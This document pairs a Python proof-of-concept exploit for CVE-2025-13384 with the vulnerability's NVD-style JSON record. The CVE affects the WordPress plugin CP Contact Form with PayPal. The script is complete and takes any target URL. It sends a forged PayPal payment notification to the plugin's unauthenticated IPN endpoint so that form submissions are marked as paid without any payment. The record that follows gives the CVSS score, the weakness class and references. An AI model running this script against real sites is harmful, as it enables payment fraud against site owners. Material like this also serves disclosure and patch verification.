CVE-2025-13384

import requests import sys # CVE-2025-13384 PoC - Missing Authorization in CP Contact Form with PayPal # Target: WordPress site with CP Contact Form with PayPal plugin <= 1.3.56 def exploit_cve_2025_13384(target_url, form_id='1'): """ Exploit for CVE-2025-13384 This PoC demonstrates how an unauthenticated attacker can forge payment notifications to mark form submissions as paid without actual payment. """ # Construct the vulnerable endpoint endpoint = f"{target_url}/?cp_contactformpp_ipncheck=1&cp_contactformpostid={form_id}" # Forge payment notification data (no signature validation) payload = { 'payment_status': 'Completed', 'txn_id': 'FAKE_TXN_' + str(hash(str(target_url)))[:10], 'payer_email': '[email protected]', 'mc_gross': '99.00', 'mc_currency': 'USD', 'item_name': 'Form Submission Payment', 'custom': form_id } print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-13384...") print(f"[*] Sending forged payment notification to: {endpoint}") try: response = requests.post(endpoint, data=payload, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") if response.status_code == 200: print("[!] Payment notification processed - form may be marked as paid") return response except requests.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [form_id]") sys.exit(1) target = sys.argv[1] form_id = sys.argv[2] if len(sys.argv) > 2 else '1' exploit_cve_2025_13384(target, form_id)

{"cve": {"id": "CVE-2025-13384", "sourceIdentifier": "[email protected]", "published": "2025-11-22T08:15:44.647", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CP Contact Form with PayPal plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.56. This is due to the plugin exposing an unauthenticated IPN-like endpoint (via the 'cp_contactformpp_ipncheck' query parameter) that processes payment confirmations without any authentication, nonce verification, or PayPal IPN signature validation. This makes it possible for unauthenticated attackers to mark form submissions as paid without making actual payments by sending forged payment notification requests with arbitrary POST data (payment_status, txn_id, payer_email)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L541", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L877", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L925", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399104%40cp-contact-form-with-paypal&new=3399104%40cp-contact-form-with-paypal&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6639c3d8-8f26-4ee5-8c4b-2efcf34668a2?source=cve", "source": "[email protected]"}]}}